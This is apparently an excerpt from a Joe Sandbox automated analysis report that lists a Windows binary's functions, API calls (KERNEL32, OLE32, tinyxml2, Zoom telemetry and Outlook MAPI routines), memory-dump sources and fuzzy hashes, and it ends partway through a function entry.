                • API ID: Document@tinyxml2@@$Error@Error@2@$Children@Clear@DeleteNode@tinyxml2@@
                • String ID:
                • API String ID: 143973664-0
                • Opcode ID: 8a69f90f1d5590e15f8df46558ae4c412730f5ad23f737b7a6d8e6d3e3c76af1
                • Instruction ID: 8ada8a8e1328e888fc242c2e18ba4f9d6b7972d8c39ef53bf44a6ada15eb941d
                • Opcode Fuzzy Hash: 8a69f90f1d5590e15f8df46558ae4c412730f5ad23f737b7a6d8e6d3e3c76af1
                • Instruction Fuzzy Hash: 00210AB17406087AEB6876788CC7FFF629CDB61764F10462DF611962C1E6A49E012172
                Function 00CAC92C Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                Download Yara Rule
                APIs
                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,?,?,?,?), ref: 00CAC95D
                • GetLastError.KERNEL32(?,?,?), ref: 00CAC96C
                • PostQueuedCompletionStatus.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C78290), ref: 00CAC992
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?), ref: 00CAC9DE
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CompletionQueuedStatus$Cmm@@ErrorLastPostState@Unlock@
                • String ID:
                • API String ID: 4285990431-0
                • Opcode ID: 24b29648f5fd74c9aa87b6cec14bf5169d7a6e276da0cbd5f0da8ec8812d6531
                • Instruction ID: fd124fff984a9f0cd45404355adf907a3da87f20fc387e8d2480d2e0ccc80d81
                • Opcode Fuzzy Hash: 24b29648f5fd74c9aa87b6cec14bf5169d7a6e276da0cbd5f0da8ec8812d6531
                • Instruction Fuzzy Hash: 2E214175E0021AAF9F248FE9C4844EFFBB5EF5A355B10802AD515E3310D7306E45CBA1
                Function 00C5C45C Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5C466
                  • Part of subcall function 00C5E9D5: __EH_prolog3_GS.LIBCMT ref: 00C5E9DC
                  • Part of subcall function 00C5E9D5: #21.MAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000070,00C5C4FE), ref: 00C5EA07
                  • Part of subcall function 00C5E9D5: #19.MAPI32(00000000,?,00000070,00C5C4FE,00D33368,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA21
                  • Part of subcall function 00C5E9D5: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA45
                  • Part of subcall function 00C5E9D5: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00000101,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA6B
                  • Part of subcall function 00C5E9D5: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000001,00000000,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA97
                  • Part of subcall function 00C5E9D5: ?Assign@?$CStringT@D@Cmm@@QAEXPBD@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EB01
                  • Part of subcall function 00C5E9D5: ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EB1A
                • ??0CSBMBMessage_OutlookOnGetDefaultProfileNotify@@QAE@XZ.RWSNDPQSKZ(00D33368,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5C51B
                  • Part of subcall function 00C5C830: __EH_prolog3.LIBCMT ref: 00C5C837
                  • Part of subcall function 00C5C830: ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_K@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.mapi.outlook.on.get.default.profile.notify,00009E69,strDefaultProfile,count,00000004), ref: 00C5C855
                • ?SetItem1@?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z.RWSNDPQSKZ(00D33368,00D33368,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5C52E
                  • Part of subcall function 00C5C660: __EH_prolog3.LIBCMT ref: 00C5C667
                • ??1?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_K@Archive@Cmm@@UAE@XZ.RWSNDPQSKZ(00009E69,00D33368,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5C55C
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$String$Archive@MessageState@Unlock@$Assign@?$Cmm@@_H_prolog3H_prolog3_Template_2@$??0?$??1?$Cmm@@@DefaultH00@Item1@?$Message_Notify@@OutlookProfileTemplate_1@W@3@@
                • String ID:
                • API String ID: 82125525-0
                • Opcode ID: a4a77b1fea53c146d4fe4ee2ac61aeb5cfad4f94054d3f4812242f9034587833
                • Instruction ID: b5ba00dff759fa4262978dff134a6430067211539f541939f6149a571fdb6745
                • Opcode Fuzzy Hash: a4a77b1fea53c146d4fe4ee2ac61aeb5cfad4f94054d3f4812242f9034587833
                • Instruction Fuzzy Hash: BD310DB4E003099FCB54DF68D58579DBBF4BF48711F10806AD858E7241EB70AA88DF55
                Function 00CC06B6 Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CC06BD
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000034,00CC0C35,?,?,?,?,?,?,?,00000020), ref: 00CC06DE
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(00D3E0D0,?,00000034,00CC0C35,?,?,?,?,?,?,?,00000020), ref: 00CC0701
                • CLSIDFromString.OLE32(?,?,?,00000034,00CC0C35,?,?,?,?,?,?,?,00000020), ref: 00CC072C
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: String$Cmm@@$??0?$Assign@?$FromH_prolog3_V01@@
                • String ID:
                • API String ID: 3182857555-0
                • Opcode ID: 1d28734758871d6838684d12807335306157729d95fa205e5b30b80757455930
                • Instruction ID: be09d0a1e4ca52314d53963e83684458927d9ee8f306d95fd2377e3d5e431fbc
                • Opcode Fuzzy Hash: 1d28734758871d6838684d12807335306157729d95fa205e5b30b80757455930
                • Instruction Fuzzy Hash: A931A235905284CFCF06CFA8D8905D9FFB0AE66301B1C8498EC946F247C6B09A49CB71
                Function 00CB4CD0 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CB4CD7
                  • Part of subcall function 00CA602C: __EH_prolog3.LIBCMT ref: 00CA6033
                  • Part of subcall function 00CA602C: ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(00D34CD0,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 00CA607A
                • GetTickCount.KERNEL32 ref: 00CB4D3C
                • ?GetTelemetryGUID@CCmmPerfTelemetry@@SAHAAV?$CStringT@_W@Cmm@@@Z.RWSNDPQSKZ(?,?,00000000,?), ref: 00CB4D7A
                  • Part of subcall function 00CB7C70: __EH_prolog3_GS.LIBCMT ref: 00CB7C77
                  • Part of subcall function 00CB7C70: ?UIntToString@Cmm@@YAXIAAV?$CStringT@_W@1@@Z.RWSNDPQSKZ(00000001,?,00000058,00CB5E51,?,0000001C,00CB4DB0,?), ref: 00CB7CAF
                  • Part of subcall function 00CB7C70: ??H?$CStringT@_W@Cmm@@QBE?AV01@PB_W@Z.RWSNDPQSKZ(00D3D264,00D3D264,00000058,00CB5E51,?,0000001C,00CB4DB0,?), ref: 00CB7CC4
                  • Part of subcall function 00CB7C70: ??H?$CStringT@_W@Cmm@@QBE?AV01@ABV01@@Z.RWSNDPQSKZ(?,?,00000058,00CB5E51,?,0000001C,00CB4DB0,?), ref: 00CB7CD7
                • ?AddPerfTelemetryStartWStack@CCmmPerfTelemetry@@SAHUPerfMetricsEvents_s@ZoomPTPAAP@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_J@std@@@3@@5@AAV?$CStringT@_W@Cmm@@_KH@Z.RWSNDPQSKZ(?), ref: 00CB4DAB
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: String$W4e_chat_perfmetrics_$Cmm@@$Perf$H_prolog3Perfmetrics_event_tag_int@@_Perfmetrics_event_tag_str@@TelemetryTelemetry@@U?$less@U?$pair@$$V01@V?$allocator@V?$map@$Assign@?$Cmm@@@Cmm@@@std@@@5@@std@@Cmm@@_CountEvents_s@H_prolog3_J@std@@@3@@5@MetricsPerfmetrics_event_tag_int@@@std@@Perfmetrics_event_tag_str@@@std@@Stack@StartString@TickV01@@W@1@@Zoom
                • String ID:
                • API String ID: 3001168285-0
                • Opcode ID: ff67d6b0bc739e27ec6bfda6342a3e56bb56fe16dc523528c6fa89f66adf03c5
                • Instruction ID: a0f980433942f434c63e627fd7497937b5966b992661eaf260e1f52511361f8c
                • Opcode Fuzzy Hash: ff67d6b0bc739e27ec6bfda6342a3e56bb56fe16dc523528c6fa89f66adf03c5
                • Instruction Fuzzy Hash: 7C315A7180474AEFCB10EFA4C945BEEBBF4BF14309F00451DE84597651DBB4AA88EBA1
                Function 00CFEBE9 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(00000000,00000000,00000000,00CFA820,00000000,?,00CFE290,?), ref: 00CFEBEE
                • _free.LIBCMT ref: 00CFEC4B
                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CFE290,?), ref: 00CFEC8C
                  • Part of subcall function 00D0003E: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,00CED4E1,?,00000001), ref: 00D00068
                • _free.LIBCMT ref: 00CFEC81
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ErrorLast_free$Cmm@@State@Unlock@
                • String ID:
                • API String ID: 3494935338-0
                • Opcode ID: 3d5a9e32f921ff8d899f2226df04a74009fb69ca29c81917263f4784c87eceba
                • Instruction ID: cd7e2e85d47b1879f961707f8bcf3dde70e3ee1c9c8705cb060498415e483ead
                • Opcode Fuzzy Hash: 3d5a9e32f921ff8d899f2226df04a74009fb69ca29c81917263f4784c87eceba
                • Instruction Fuzzy Hash: 5411C6322007887AD6913775ACC5F3A2A5EDBC1774B354225F738C62F2DE358E41A172
                Function 00CBCA91 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                Download Yara Rule
                APIs
                • ??0?$CStringT@D@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(00000004,?,00000004,?,00CBCA53,0000004C,00000004,?,?,?,00CBBCCD,?,?,00000004,00000000,?), ref: 00CBCA9C
                • ??0?$CStringT@D@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(00000020,00000004,?,00000004,?,00CBCA53,0000004C,00000004,?,?,?,00CBBCCD,?,?,00000004,00000000), ref: 00CBCAA8
                • ??0?$CStringT@D@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(00000068,00000020,00000004,?,00000004,?,00CBCA53,0000004C,00000004,?,?,?,00CBBCCD,?,?,00000004), ref: 00CBCAF6
                • ??0?$CStringT@D@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(000000B4,00000068,00000020,00000004,?,00000004,?,00CBCA53,0000004C,00000004,?,?,?,00CBBCCD), ref: 00CBCB98
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ??0?$Cmm@@E@$$StringV01@@
                • String ID:
                • API String ID: 2932468982-0
                • Opcode ID: 1b3ff19e92735463b8db33c8d59e3ba3f0555bb7e4eb5ce1313fb7f3e3a76123
                • Instruction ID: 9f959d5e1ba1239c87f2c3a279e52d93e6d7d5a102816c15eb4bc0d4c4d675ee
                • Opcode Fuzzy Hash: 1b3ff19e92735463b8db33c8d59e3ba3f0555bb7e4eb5ce1313fb7f3e3a76123
                • Instruction Fuzzy Hash: 3631FE79A01B15AFC368CF39C580B96F7E4BF49214F00452EE9AAC3B01DB71B454CB91
                Function 00CC0799 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CC07A0
                • StringFromCLSID.OLE32(?,?,0000004C,00CC0C88,?), ref: 00CC07EC
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(?), ref: 00CC0804
                  • Part of subcall function 00C54490: __EH_prolog3.LIBCMT ref: 00C54497
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                • CoTaskMemFree.OLE32(?,?,?,00000000,?,?), ref: 00CC0839
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: String$??0?$Cmm@@DeallocateFreeFromH_prolog3H_prolog3_Task
                • String ID:
                • API String ID: 3064493233-0
                • Opcode ID: b404816ddecf042627db5947023383ceb607096bad6e9a50766cf5f1c5ab9360
                • Instruction ID: f5746e49a29591eb5e148356f26e2a5fa76716230e38a032b296a2b6704b4200
                • Opcode Fuzzy Hash: b404816ddecf042627db5947023383ceb607096bad6e9a50766cf5f1c5ab9360
                • Instruction Fuzzy Hash: E9218E358097C89ECB11DFE4C4519DFBFF89F19300B04C85DE8E6A7702DA20A648DBA1
                Function 00CFED40 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,00000001,?,00CF27FA,00CED455,?,?,?,?,00CED4E1,?,00000001), ref: 00CFED45
                • _free.LIBCMT ref: 00CFEDA2
                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CF27FA,00CED455,?,?,?,?,00CED4E1,?,00000001), ref: 00CFEDE3
                  • Part of subcall function 00D0003E: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,00CED4E1,?,00000001), ref: 00D00068
                • _free.LIBCMT ref: 00CFEDD8
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ErrorLast_free$Cmm@@State@Unlock@
                • String ID:
                • API String ID: 3494935338-0
                • Opcode ID: 3ae416045fd57be3b54ca7d028ed3a5c9e5cbeef1bac1fac6e74885db2920c68
                • Instruction ID: c3cee5e7ef2405e3c76c2f4f4ac39a9c7b12c6cf0e18f5fd008063010c0edbbc
                • Opcode Fuzzy Hash: 3ae416045fd57be3b54ca7d028ed3a5c9e5cbeef1bac1fac6e74885db2920c68
                • Instruction Fuzzy Hash: 2F11A5326003887AD7A12779AC85F7A266EDBC1774B254325F728D62F1DE358E41A132
                Function 00C6051C Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C60523
                  • Part of subcall function 00C60601: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?), ref: 00C60619
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00000000,?,?,00000040,00C5FE18,?,0042001F,?,00D34D91,?), ref: 00C60575
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(00000004), ref: 00C605D1
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(-00000004,00000004), ref: 00C605B1
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Assign@?$State@StringUnlock@$H_prolog3H_prolog3_
                • String ID:
                • API String ID: 2318406440-0
                • Opcode ID: 21ad47efcee6aa03fb7586df4edc472ee775e0785ede20f0e807a2d9835efaf9
                • Instruction ID: 6be8455878348a1b34283c9cc5720b8059d8b9ced2855884ec407e1d0d80ef1c
                • Opcode Fuzzy Hash: 21ad47efcee6aa03fb7586df4edc472ee775e0785ede20f0e807a2d9835efaf9
                • Instruction Fuzzy Hash: DB213EB0D00209DFCB29DF94C9919AEFBF5BF98300B14411AE806B7250DB70AE46DF65
                Function 00CB27A0 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                Download Yara Rule
                APIs
                • ?Clear@XMLDocument@tinyxml2@@QAEXXZ.RWSNDPQSKZ(?,?,00000000,?,00CA5CCC,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?,00000001,?,?), ref: 00CB27A8
                  • Part of subcall function 00CB23B0: ?DeleteChildren@XMLNode@tinyxml2@@QAEXXZ.RWSNDPQSKZ(?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?), ref: 00CB23B4
                  • Part of subcall function 00CB23B0: ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001), ref: 00CB23D5
                • ?Parse@XMLDocument@tinyxml2@@AAEXXZ.RWSNDPQSKZ ref: 00CB27F7
                • ?DeleteChildren@XMLNode@tinyxml2@@QAEXXZ.RWSNDPQSKZ ref: 00CB2805
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,0000000D,00000000,00000000,?,?,00000000,?,00CA5CCC,?,000000FF,00000001,00000000,000001C8,00CA29E7,?), ref: 00CB283F
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Document@tinyxml2@@$Children@DeleteError@Error@2@Node@tinyxml2@@$Clear@Parse@
                • String ID:
                • API String ID: 1658233641-0
                • Opcode ID: 695fe572179551105f5d8f1be693814d7b1ee88f0ab3e723e71a20ec01a07b70
                • Instruction ID: ecfa6f26165809004d3a3436e4b3a10ba7cd7e483bf85ace7c75cb01373ac543
                • Opcode Fuzzy Hash: 695fe572179551105f5d8f1be693814d7b1ee88f0ab3e723e71a20ec01a07b70
                • Instruction Fuzzy Hash: 4311E3326002916BD729EA75D881FEBF798EF10750F440619F8B5575C2DB21BE14E7E0
                Function 00CA2A20 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                Download Yara Rule
                APIs
